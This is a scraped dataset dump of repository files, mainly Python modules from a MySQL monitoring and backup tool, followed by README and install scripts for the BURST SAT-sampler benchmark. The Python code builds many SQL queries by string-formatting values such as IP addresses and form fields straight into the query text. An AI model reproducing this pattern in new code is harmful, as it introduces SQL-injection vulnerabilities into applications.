cursor=PyMySQL().query(sql_2, type='dict')\n data_list=cursor.fetchall()\n if data_list and len(data_list) >0 :\n _list=(1,5,10,100)\n for data in data_list:\n c=''\n _pre_c=0 \n _counts=[]\n for l in _list:\n _c=0\n _sql=\"select count(*) from slowlog_info where instance_id=%s and dbname='%s' and start_time between '%s' and '%s' and query_time between %s and %s;\" \\\n %(data.get('instance_id'),data.get('dbname'),_pre_time,_time,_pre_c,l)\n _c=PyMySQL().fetchOne(_sql)\n _counts.append(int(_c))\n _pre_c=l\n _counts.append(int(data.get('counts')-sum(_counts)))\n #make sure all the values bigger than zero\n _counts=map(lambda x :abs(x),_counts)\n data['count_all']=_counts\n sql_3=\"select id from slowlog_time_day where instance_id=%s and db='%s' and date(log_time)='%s'\" %(data.get('instance_id'),data.get('dbname'),today())\n #log.debug(sql_3)\n row_id=PyMySQL().fetchOne(sql_3)\n c=data.get('count_all')\n if not row_id or row_id == 0:\n _sql=\"insert into slowlog_time_day(instance_id,db,log_time,counts,lt_one,lt_five,lt_ten,lt_hundred,gt_hundred) values(%s,'%s',from_unixtime(%s),%s,%s,%s,%s,%s,%s)\" % (data.get('instance_id'), \n data.get('dbname'),data.get('start_time'),\n data.get('counts'),c[0],c[1],c[2],c[3],c[4])\n else:\n _sql=\"update slowlog_time_day set counts=counts+%s,lt_one=lt_one+%s,lt_five=lt_five+%s,lt_ten=lt_ten+%s,lt_hundred=lt_hundred+%s,gt_hundred=gt_hundred+%s \\\n where id=%s\" %(data.get('counts'),c[0],c[1],c[2],c[3],c[4],row_id) \n # log.debug(_sql)\n result,ex=PyMySQL().execute(_sql)\n if not result :\n log.error(ex)\n return True\n \ndef slowlog_pack(sql):\n try:\n sql_parsed=SQLParse(sql).var_replace()\n except:\n sql_parsed=sql \n sql_hash=md5(sql_parsed.encode('utf8')).hexdigest()\n _sql=\"select count(*) from sql_format where hash_code='%s'\" % sql_hash\n _counts=PyMySQL().fetchOne(_sql)\n if _counts == 0:\n _sql=\"insert into sql_format(hash_code,sql_parsed) values('%s','%s')\" %(sql_hash,sql_parsed)\n PyMySQL().execute(_sql)\n return sql_hash\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5819398164749146, "alphanum_fraction": 0.5969899892807007, "avg_line_length": 22.959999084472656, "blob_id": "2002c8eeb3975797ef6ebcf26e69e26984d2917c", "content_id": "3373ccaf5d1cfaa13bf3829ea3e6bdccaa5b92f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 598, "license_type": "no_license", "max_line_length": 101, "num_lines": 25, "path": "/src/mega_client/setup.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 21, 2014\n\n@author: xchliu\n\n@module:mega_service.mega_client.setup\n'''\n\nfrom distutils.core import setup\n\nVERSION='1.0'\n\nsetup(name='mega',\n version=VERSION,\n description='Mega client',\n author='XCHLIU',\n author_email='[email protected]',\n py_modules=['mega_client.sender','mega_client.utils','mega_client.logs','mega_client.setting'],\n #url='',\n #packages=['mega_client','mega_client/script'],\n #package_dir={'mypkg': 'src/mypkg'},\n # package_data={'mypkg': ['data/*.dat']},\n #data_files=[('',['install.sh'])]\n )" }, { "alpha_fraction": 0.6915887594223022, "alphanum_fraction": 0.722741425037384, "avg_line_length": 19.03125, "blob_id": "8b82fa0f5d81b5bfa2ecd1dcc347e1c90e061402", "content_id": "76adf0b075fec8a81325c3378eddf3ceb493def7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 642, "license_type": "no_license", "max_line_length": 60, "num_lines": 32, "path": "/src/mega_client/mega-1.0/mega_client/setting.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 29, 2014\n\n@author: xchliu\n\n@module:mega_service.mega_client.setting\n\n'''\n#meta data\nversion='mega-client 0.1'\nTCP_HOST='' # default 0.0.0.0\nTCP_PORT=1105\nMEGA_HOST='mega-server.d.chinabank.com.cn'\nMEGA_HOST='localhost'\n\n\nKEEPALIVE=300\n\n#all the script invoked by worker should be in the directory\nSCRIPT_DIR='/home/mysql/admin/mega_client/script/'\n\n#only used for client . \nCLIENT_DIR='/home/mysql/'\n\nDEAFULT_LOG_DEBUG=True\nLOG_FILE_NAME='/var/log/mega/mega_client.log'\nDAEMON_PID='/var/run/mega_client.pid'\nSERVICE_PID='/var/run/mega_client_srv.pid'\nDAEMON_LOG=LOG_FILE_NAME\n\nDEFAULT_TARGET='cmd'\n\n" }, { "alpha_fraction": 0.6156960725784302, "alphanum_fraction": 0.6190179586410522, "avg_line_length": 48.6134033203125, "blob_id": "b5cd53ceeed5cd9e92ba965adc7b252da275c99f", "content_id": "318023eb0c536e109f0838ac189477f22821f553", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9633, "license_type": "no_license", "max_line_length": 162, "num_lines": 194, "path": "/src/mega_web/console/backup.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import time\nimport datetime\nfrom lib.utils import today\nfrom lib.PyMysql import PyMySQL\nfrom mega_web.resource.server_manage import ServerGet\nfrom mega_web.resource.instance_manage import InstanceGet\nfrom mega_web.resource.business_manage import BusinessGet\nfrom mega_web.entity.models import Backup_History_Info,Backup_Policy\nfrom conf.GlobalConf import BACKUP_TOOL,BACKUP_TYPE,BACKUP_LEVEL,BACKUP_CYCLE,DEFAULT_DB_PORT,MIN_BACKUP_PERIOD\n\n\n\nclass Backup():\n def __init__(self):\n self.backup_info=Backup_History_Info\n self.backup_policy=Backup_Policy\n self.q=PyMySQL()\n \n def get_newest_backup_list(self,ip=None):\n if (not ip) or (ip == ''):\n sql=\"select * from backup_history_info order by id desc limit 150;\"\n else:\n sql=\"select * from backup_history_info where host_ip='%s' limit 150;\" % ip\n _data=[dict(d.__dict__) for d in self.backup_info.objects.raw(sql)]\n for _d in _data:\n ip=_d['host_ip']\n port=_d['port']\n instance_id=InstanceGet().get_instance_by_ip_port(ip, port)\n if not instance_id:\n continue\n instance_id=instance_id[0]['id']\n _d['instance_id']=instance_id\n inst=InstanceGet().get_instance_by_id(instance_id)\n _d['instance_name']=inst['name']\n _d['business_name']=BusinessGet().get_business_by_id(inst['business_id'])['name']\n _d['server_name']=ServerGet().get_server_by_id(inst['server_id'])['name']\n return _data\n \n def get_config_by_instance(self,ip='',port=3306):\n if not ip:\n return None,''\n if not port:\n port=3306\n instance_id=InstanceGet().get_instance_by_ip_port(ip, port)\n if not instance_id:\n instance_id=None\n return None,\"Instance does not exist!\"\n else:\n sql=\"select * from backup_policy where host_ip='%s' and port=%s;\" % (ip ,port)\n return self.backup_info.objects.raw(sql),''\n def get_config_list(self,ip=None):\n if not ip :\n sql=\"select * from backup_policy order by is_schedule desc;\"\n else:\n sql=\"select * from backup_policy where host_ip='%s';\" % ip\n return self.backup_policy.objects.raw(sql)\n def get_today_statics(self,date=None): \n if not date:\n date=today() \n #planed counts\n _now={}\n _now[\"week\"]=time.strftime('%a',time.strptime(date,'%Y-%m-%d'))\n _now[\"month\"]=time.strftime('%d',time.strptime(date,'%Y-%m-%d')) \n sql=\"select count(*) from backup_policy where cycle='day' and is_schedule=1\"\n count_day=self.q.fetchOne(sql)\n sql=\"select count(*) from backup_policy where cycle='week' and find_in_set('%s',backup_time) and is_schedule=1\" %(_now['week'])\n count_week=self.q.fetchOne(sql)\n sql=\"select count(*) from backup_policy where cycle='month' and find_in_set('%s',backup_time) and is_schedule=1\" %(_now['month'])\n count_month=self.q.fetchOne(sql)\n total_today=count_day+count_week+count_month\n \n #ran backup\n sql=\"select count(*) from backup_history_info where date(backup_begin_time)='%s' and backup_status='Y' \" % date\n success_count=self.q.fetchOne(sql)\n sql=\"select count(*) from backup_history_info where date(backup_begin_time)='%s' and backup_status='N' \" % date\n failure_count=self.q.fetchOne(sql)\n success_ratio=(success_count*100)/total_today\n failure_ratio=(failure_count*100)/total_today\n return {\"total_today\":total_today,\"success_count\":success_count,\"success_ratio\":success_ratio,\"failure_count\":failure_count,\"failure_ratio\":failure_ratio}\n \n def get_uninvoked_backup(self,date=None):\n if not date:\n date=today()\n _now={}\n _now[\"week\"]=time.strftime('%a',time.strptime(date,'%Y-%m-%d'))\n _now[\"month\"]=time.strftime('%d',time.strptime(date,'%Y-%m-%d'))\n sql=\"select a.* from backup_policy a left join backup_history_info b on a.host_ip=b.host_ip and a.port=b.port and a.backup_tool=b.backup_tool and \\\n a.backup_level=b.backup_level and date(b.backup_begin_time)='%s' where a.cycle='day' and a.is_schedule=1 and b.id is null;\" %(date)\n _day=self.q.fetchAll(sql)\n sql=\"select a.*,b.id from backup_policy a left join backup_history_info b on a.host_ip=b.host_ip and a.port=b.port and a.backup_tool=b.backup_tool \\\n and a.backup_level=b.backup_level and date(b.backup_begin_time)='%s' where a.cycle='week' and a.is_schedule=1 and find_in_set('%s',backup_time)\\\n and b.id is null;\" %(date,_now['week'])\n _week=self.q.fetchAll(sql)\n sql=\"select a.*,b.id from backup_policy a left join backup_history_info b on a.host_ip=b.host_ip and a.port=b.port and a.backup_tool=b.backup_tool \\\n and a.backup_level=b.backup_level and date(b.backup_begin_time)='%s' where a.cycle='month' and a.is_schedule=1 and find_in_set('%s',backup_time)\\\n and b.id is null;\" %(date,_now['month'])\n _month=self.q.fetchAll(sql)\n data=[x for x in _day]+[x for x in _week]+[x for x in _month]\n return data\n \n def get_failed_backup(self,time=None):\n '''\n return the failed backup info in the given or current hour \n '''\n date=today()\n if not time:\n time=datetime.datetime.now().strftime('%H:%M')\n hour,minite=time.split(':')\n sql=\"select id,host_ip,port,db_type,backup_tool,backup_type,backup_begin_time,file_size,status,message from backup_history_info where \\\n date(backup_begin_time)='%s' and hour(backup_begin_time)=%s and backup_status ='N';\" %(date,hour)\n return self.q.fetchAll(sql)\n \n def get_unavailable_backup(self,time=None):\n '''\n return the list of instance which have no available backup in option days\n '''\n date=today(MIN_BACKUP_PERIOD)\n sql=\"select a.* from backup_policy a left join backup_history_info b on a.host_ip=b.host_ip and a.port=b.port and a.backup_tool=b.backup_tool and \\\n a.backup_level=b.backup_level and date(b.backup_begin_time)>'%s' where a.is_schedule=1 and b.id is null;\" %(date)\n data=self.q.fetchAll(sql)\n return data\n \n \nclass Backup_Config():\n def __init__(self):\n self.backup_tool=BACKUP_TOOL\n self.backup_type=BACKUP_TYPE\n self.backup_level=BACKUP_LEVEL\n self.backup_cycle=BACKUP_CYCLE\n self.backup_policy=Backup_Policy()\n def config_deliver(self,config):\n self.config=config\n type=config.get('type')\n if type == 'add':\n return self.config_add()\n elif type == 'mod':\n return self.config_mod()\n else:\n return False\n def config_add(self):\n self.backup_policy.host_ip=self.config.get(\"ip\")\n if self.config.get(\"port\"):\n self.backup_policy.port=self.config.get(\"port\")\n else:\n self.backup_policy.port=DEFAULT_DB_PORT\n if self.config.get(\"is_scheduled\")=='ON':\n self.backup_policy.is_schedule=1\n else:\n self.backup_policy.is_schedule=0\n db_type=self.config.get(\"db_type\")\n if not db_type:\n self.backup_policy.db_type='mysql'\n else:\n self.backup_policy.db_type=db_type\n self.backup_policy.backup_tool=self.config.get(\"backup_tool\")\n self.backup_policy.backup_type=self.config.get(\"backup_type\")\n self.backup_policy.isencrypted=self.config.get(\"isencrypted\")\n self.backup_policy.cycle=self.config.get('backup_cycle')\n self.backup_policy.schedule_time=self.config.get(\"schedule_time\")\n self.backup_policy.iscompressed=self.config.get(\"iscompressed\")\n self.backup_policy.need_data=self.config.get(\"need_data\")\n self.backup_policy.need_schema=self.config.get(\"need_schema\")\n self.backup_policy.backup_level=self.config.get(\"backup_level\")\n self.backup_policy.level_value=self.config.get(\"level_value\")\n self.backup_policy.backup_time=self.config.get(\"backup_time\")\n self.backup_policy.retention=self.config.get(\"retention\")\n self.backup_policy.save()\n return True\n def config_mod(self):\n config_id=self.config.get(\"id\")\n if config_id:\n backup_policy=Backup_Policy.objects.get(id=config_id)\n else:\n return False\n if self.config.get(\"is_scheduled\")=='ON':\n self.backup_policy.is_schedule=1\n else:\n self.backup_policy.is_schedule=0\n# _time=time.strftime(self.config.get(\"schedule_time\").replace('.',''),\"%I:%M %p\")\n \n backup_policy.backup_tool=self.config.get(\"backup_tool\")\n backup_policy.backup_type=self.config.get(\"backup_type\")\n backup_policy.isencrypted=self.config.get(\"isencrypted\")\n backup_policy.cycle=self.config.get('backup_cycle')\n backup_policy.schedule_time=self.config.get(\"schedule_time\")\n backup_policy.iscompressed=self.config.get(\"iscompressed\")\n backup_policy.need_data=self.config.get(\"need_data\")\n backup_policy.need_schema=self.config.get(\"need_schema\")\n backup_policy.backup_level=self.config.get(\"backup_level\")\n backup_policy.level_value=self.config.get(\"level_value\")\n backup_policy.backup_time=self.config.get(\"backup_time\")\n backup_policy.retention=self.config.get(\"retention\")\n backup_policy.save()\n return True\n " } ]
80
diverse-project/BURST
https://github.com/diverse-project/BURST
ab9b0c4b268f096da2c3f0cf943bdd3c28f486ab
8ceeb56500d25432f220eb480da95ff496417eb7
c7e0d46e4cfa63c5365073422bfba73140a6d3ab
refs/heads/master
2023-08-30T00:21:42.132200
2022-06-09T14:39:24
2022-06-09T14:39:24
449,823,806
0
1
null
2022-01-19T19:15:19
2022-01-19T19:33:24
2022-01-19T19:43:57
C
[ { "alpha_fraction": 0.731370747089386, "alphanum_fraction": 0.7610723972320557, "avg_line_length": 68.10909271240234, "blob_id": "a4fad6b3f66b3a94e74766559fe4a244fdc6b5d7", "content_id": "a7f8dcf0c290ea1300b0f099dcf345612980f7dc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7609, "license_type": "permissive", "max_line_length": 633, "num_lines": 110, "path": "/README.md", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "# BURST a benchmarking platform for uniform random sampling techniques\n\nBURST provides Python scripts and Docker environment for evaluating state-of-the-art feature model and SAT samplers (KUS, SPUR, Unigen, etc.) as well as proven statistical test (Barbarik). \nBURST comes with an extensive --- and extensible --- benchmark dataset comprising 500+ SAT formuale and feature models, including challenging, real-world models of the Linux kernel. A demonstration of the tool is available: \n[![Alt\ntext](https://img.youtube.com/vi/sSKosyrfitA/1.jpg)](https://www.youtube.com/watch?v=sSKosyrfitA)\n\n## Usage \n\nYou only need to pull the Docker image `macher/usampling:squashed` that contains both scripts and benchmarks. \n\nTo verify that your installation is correct, please run the following command: \n`docker run macher/usampling:squashed /bin/bash -c 'cd /home/usampling-exp/; echo STARTING; python3 barbarikloop.py -flas /home/samplingfm/Benchmarks/FeatureModels/FM-3.6.1-refined.cnf --ref-sampler 6 --sampler 2 --seed 1 --timeout 50000; echo END'` \n\nA message with `NOT UNIFORM` should appear at the end. \nThe sampler `QuickSampler` has been used over the formula `/home/samplingfm/Benchmarks/FeatureModels/FM-3.6.1-refined.cnf` \n\nIn addition to pull the Docker image, we recommand to clone this repo. Like this, you can benefit from the most recent updates (or simply edit the scripts) by mounting the repo within the Docker image.\nFor instance, you can interactively used the image `docker run -it -v $(pwd):/home/usampling-exp:z macher/usampling:squashed /bin/bash` \nand the scripts are located in `/home/usampling-exp/` \n\n\n### Usage (Sampling)\n\nThe previous example was to check uniformity. \nYou can also generate samples with some samplers.\nFor instance:\n\n`docker run -v $(pwd):/home/usampling-exp:z macher/usampling:squashed /bin/bash -c 'cd /home/usampling-exp/; echo STARTING; python3 usampling-experiments.py -flas /home/samplingfm/Benchmarks/Blasted_Real/blasted_case141.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case142.cnf --spur -t 1; echo END'`\n\nis calling SPUR sampler, with a timeout of 1 second, and with formulas explicitly given (here two formulas: useful to focus on specific formulas). \nYou can also specify a folder.\nWithout `flas` default formulas contained in the Docker folder/subfolders `/home/samplingfm/` are processed (around 500 files).\n\nTypical outcomes are:\n\n```\ncat usampling-data/experiments-KUS.csv\nformula_file,timeout,execution_time_in,dnnf_time,sampling_time,model_count,counting_time,dnnfparsing_time\n/home/samplingfm/Benchmarks/FeatureModels/FM-3.6.1-refined.cnf,False, 0.1399824619293213, 0.011404275894165039, 0.0007951259613037109, 26256, 0.0008006095886230469, 0.0012776851654052734\n```\n\nThe meaning of columns of the CSV file is as follows: `formula_file': the name of the processed model; `timeout': whether a timeout has been reached or not; `execution_time_in' overall execution time; `dnnf_time': the time required by KUS to compile the corresponding DNNF formula; `sampling_time': time taken to produce the samples; `model_count': the number of solutions in the model; `counting\\_time': time taken to count solutions; `dnnfparsing_time': time taken to parse the compiled DNNF formula. All times are reported in seconds.\n\n### Usage (Uniformity)\n\nWe assess uniformity with Barbarik (https://github.com/meelgroup/barbarik). To compute uniformity for a set of models, inside the Docker: `python3 barbarikloop.py -flas gilles --sampler 10 --seed 1 --timeout 60` where sampler is the sampler to be assessed (1=Unigen, 2=QuickSampler, 3=STS, 4=CMS, 5=UniGen3, 6=SPUR, 7=SMARCH, 8=UniGen2,9=KUS, 10=Distance-based Sampling), seed an integer seed and a timeout in seconds. it supports all the parameters of barbarik (use --help to see a description of all the options). We can also specify the sampler used as reference the same way with `--ref-sampler` followed by the sampler to use.\n\nA full usage example is as follows: \n\n`docker run -v $(pwd):/home/usampling-exp:z macher/usampling:squashed /bin/bash -c 'cd /home/usampling-exp/; echo STARTING; python3 barbarikloop.py -flas /home/samplingfm/Benchmarks/FeatureModels/FM-3.6.1-refined.cnf --sampler 9 --seed 1 --timeout 100; echo END'` \n\nIt's QuickSampler with JHipster feature model and timeout=100 seconds... end eta/epsilon defaut values `cmd: ['python3', 'barbarik.py', '--seed', '1', '--verb', '1', '--eta', '0.9', '--epsilon', '0.3', '--delta', '0.05', '--reverse', '0', '--exp', '1', '--minSamples', '0', '--maxSamples', '9223372036854775807', '--sampler', '9', '--ref-sampler','6', '/home/samplingfm/Benchmarks/FeatureModels/FM-3.6.1-refined.cnf']` \n\n## Samplers and data used \n\n```\nSAMPLER_UNIGEN = 1\nSAMPLER_QUICKSAMPLER = 2\nSAMPLER_STS = 3\nSAMPLER_CMS = 4\nSAMPLER_UNIGEN3 = 5\nSAMPLER_SPUR = 6\nSAMPLER_SMARCH = 7\nSAMPLER_UNIGEN2 = 8\nSAMPLER_KUS = 9\nSAMPLER_DISTAWARE = 10\n```\n\nWith BURST, large study and results of different SAT-based samplers are possible:\n * KUS https://github.com/meelgroup/KUS (new!)\n * SPUR https://github.com/ZaydH/spur (new!) \n * Unigen2 and QuickSampler https://github.com/diverse-project/samplingfm/\n * SMARCH https://github.com/jeho-oh/Kclause_Smarch/tree/master/Smarch (new!)\n * other: Unigen3, CMS, STS (new!)\nover different data:\n * https://github.com/diverse-project/samplingfm/ (including SAT formulas and hard feature models)\n * https://github.com/PettTo/Feature-Model-History-of-Linux (new!)\n\n### Pre-built Docker image \n\nWe recommend to use `macher/usampling:squashed` but other variants are possible (eg `macher/usampling:fmlinux` for a Docker image with th 5Gb dataset of Linux feature model)\nEverything is available here https://cloud.docker.com/repository/docker/macher/usampling\n\n### Requirements\n\n * Docker image with Python 3, pandas, numpy, setuptools, pycoSAT, anytree \n * solvers above and a proper installation \n * time and resources ;) \n\n\n\n## Architecture and extensibility \n\n### Organization of the repo \n\n * All samplers are in `samplers` directory (and all utilities/dependencies are also in this folder)\n * `usampling-experiments.py` pilots the scalability study of samplers over different datasets \n * `barbarik.py` pilots the uniformity checking of samplers over different datasets. It is based on the barbarik tool from Kuldeep Meel et al: https://github.com/meelgroup/barbarik. This version supports uniformity check for all the 10 solvers above and uses KUS as a reference uniform solver, if not specified in the command line above.\n * `barbarikloop.py` allows to run uniformity checks on set fo files (using the same flas technique as above) and report the results in a CSV file\n\n### Extensibility \n\nTo configure a new sampler to work with Barbarik, here are the basic steps in `barbarik.py` (see also comments in the script): \n\n * add a new number/enumeration eg `SAMPLER_XXX = 11`\n * expand the class `SolutionRetriver`. This is the class where solution obtained from samplers are fed to Barbarik. you need to: \n * 1. define a method `get_solution_from_XXX(*topass_withseed)` in this class. This method needs to parse the output of the sampler and create an internal representation fo the list of solutions. Each solution is a list of literals preceded by '-' if is not selected.\n * 2. Wrap the call at the beginning of the Class: if/elif blocks.\nNote that since all samplers have different output formats, most of the work consists of parsing the output to create a list of solutions in a format acceptable by Barbarik. This step can be very specific and ad-hoc; we provide facilities to ease the effort and integration. \n \n" }, { "alpha_fraction": 0.72947758436203, "alphanum_fraction": 0.7966417670249939, "avg_line_length": 28.83333396911621, "blob_id": "38733d10be9969ca5cb89ecdfd24da42668b5d44", "content_id": "c9da37d4c3fb658418bf6ff989bc64e228e0c02b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 536, "license_type": "permissive", "max_line_length": 92, "num_lines": 18, "path": "/samplers/splconqueror.sh", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "git clone https://github.com/maxcordy/SPLConqueror.git\ncd SPLConqueror\ngit submodule update --init --recursive\napt-get update\napt install mono-complete monodevelop\napt install nuget\ncd SPLConqueror/\nnuget restore\ncd SPLConqueror/\nxbuild SPLConqueror_Core.csproj\ncd ../MachineLearning\nxbuild MachineLearning.csproj\ncd ../CommandLine\nxbuild CommandLine.csproj\ncd bin/Debug\nwget https://github.com/Z3Prover/z3/releases/download/z3-4.8.7/z3-4.8.7-x64-ubuntu-16.04.zip\nunzip z3-4.8.7-x64-ubuntu-16.04.zip\ncp z3-4.8.7-x64-ubuntu-16.04/bin/* ." }, { "alpha_fraction": 0.7528606057167053, "alphanum_fraction": 0.8272817134857178, "avg_line_length": 791.8571166992188, "blob_id": "845434dc9983c318440276961b85b7d459ca8895", "content_id": "2d875def0089e0b6a546180470f4013e0d8f44fe", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11099, "license_type": "permissive", "max_line_length": 10478, "num_lines": 14, "path": "/usampling-data/results-timeout180-IGRIDA/deprecated/README.md", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "deprecated since the set of formulas is a bit different from the rigorous reverse engineering process of TAPLAS, ICSE, etc. for identifying actual formulas used\nno problem: experiment made again\n\nexperiments with\n\n#OAR -l nodes=1/thread=16,walltime=12:00:00 \n#OAR -p virt='YES' AND cluster='armada'\n\nBENCH=\"/home/samplingfm/Benchmarks/V7/s349_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case146.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case145.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case132.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case135.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b14_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b14_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_3_b14_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case109.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case145.cnf /home/samplingfm/Benchmarks/V3/s382_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case123.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case119.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b14_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b14_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_3_b14_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case9.cnf /home/samplingfm/Benchmarks/V7/s382_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case61.cnf /home/samplingfm/Benchmarks/V15/s344_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case120.cnf /home/samplingfm/Benchmarks/V15/s349_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case57.cnf /home/samplingfm/Benchmarks/V3/s444_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case121.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case62.cnf /home/samplingfm/Benchmarks/V3/s420_3_2.cnf /home/samplingfm/Benchmarks/V3/s420_new1_3_2.cnf /home/samplingfm/Benchmarks/V3/s420_new_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case33.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case202.cnf /home/samplingfm/Benchmarks/V3/s510_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case126.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b14_3.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b14_3.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_3_b14_3.cnf /home/samplingfm/Benchmarks/V7/s444_7_4.cnf /home/samplingfm/Benchmarks/V7/s420_new1_7_4.cnf /home/samplingfm/Benchmarks/V7/s420_new_7_4.cnf /home/samplingfm/Benchmarks/V7/s420_7_4.cnf /home/samplingfm/Benchmarks/V7/s349_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case146.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case145.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case132.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case135.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b14_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b14_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_3_b14_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case109.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case145.cnf /home/samplingfm/Benchmarks/V3/s382_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case123.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case119.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b14_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b14_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_3_b14_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case9.cnf /home/samplingfm/Benchmarks/V7/s382_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case61.cnf /home/samplingfm/Benchmarks/V15/s344_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case120.cnf /home/samplingfm/Benchmarks/V15/s349_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case57.cnf /home/samplingfm/Benchmarks/V3/s444_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case121.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case62.cnf /home/samplingfm/Benchmarks/V3/s420_3_2.cnf /home/samplingfm/Benchmarks/V3/s420_new1_3_2.cnf /home/samplingfm/Benchmarks/V3/s420_new_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case33.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case202.cnf /home/samplingfm/Benchmarks/V3/s510_3_2.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case126.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b14_3.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b14_3.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_3_b14_3.cnf /home/samplingfm/Benchmarks/V7/s444_7_4.cnf /home/samplingfm/Benchmarks/V7/s420_new1_7_4.cnf /home/samplingfm/Benchmarks/V7/s420_new_7_4.cnf /home/samplingfm/Benchmarks/V7/s420_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case122.cnf /home/samplingfm/Benchmarks/V7/s510_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case60.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_0_b11_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b11_1.cnf /home/samplingfm/Benchmarks/V15/s510_15_7.cnf /home/samplingfm/Benchmarks/V15/s382_15_7.cnf /home/samplingfm/Benchmarks/V15/s420_new_15_7.cnf /home/samplingfm/Benchmarks/V3/s526_3_2.cnf /home/samplingfm/Benchmarks/V15/s420_15_7.cnf /home/samplingfm/Benchmarks/V15/s420_new1_15_7.cnf /home/samplingfm/Benchmarks/V3/s526a_3_2.cnf /home/samplingfm/Benchmarks/V15/s444_15_7.cnf /home/samplingfm/Benchmarks/V7/s526_7_4.cnf /home/samplingfm/Benchmarks/V7/s526a_7_4.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case125.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case35.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case34.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case143.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_0_b12_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_2_b12_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case_1_b12_1.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case115.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case114.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case131.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_case116.cnf /home/samplingfm/Benchmarks/V15/s526_15_7.cnf /home/samplingfm/Benchmarks/V15/s526a_15_7.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring51.cnf /home/samplingfm/Benchmarks/Blasted_Real/blasted_squaring50.cnf 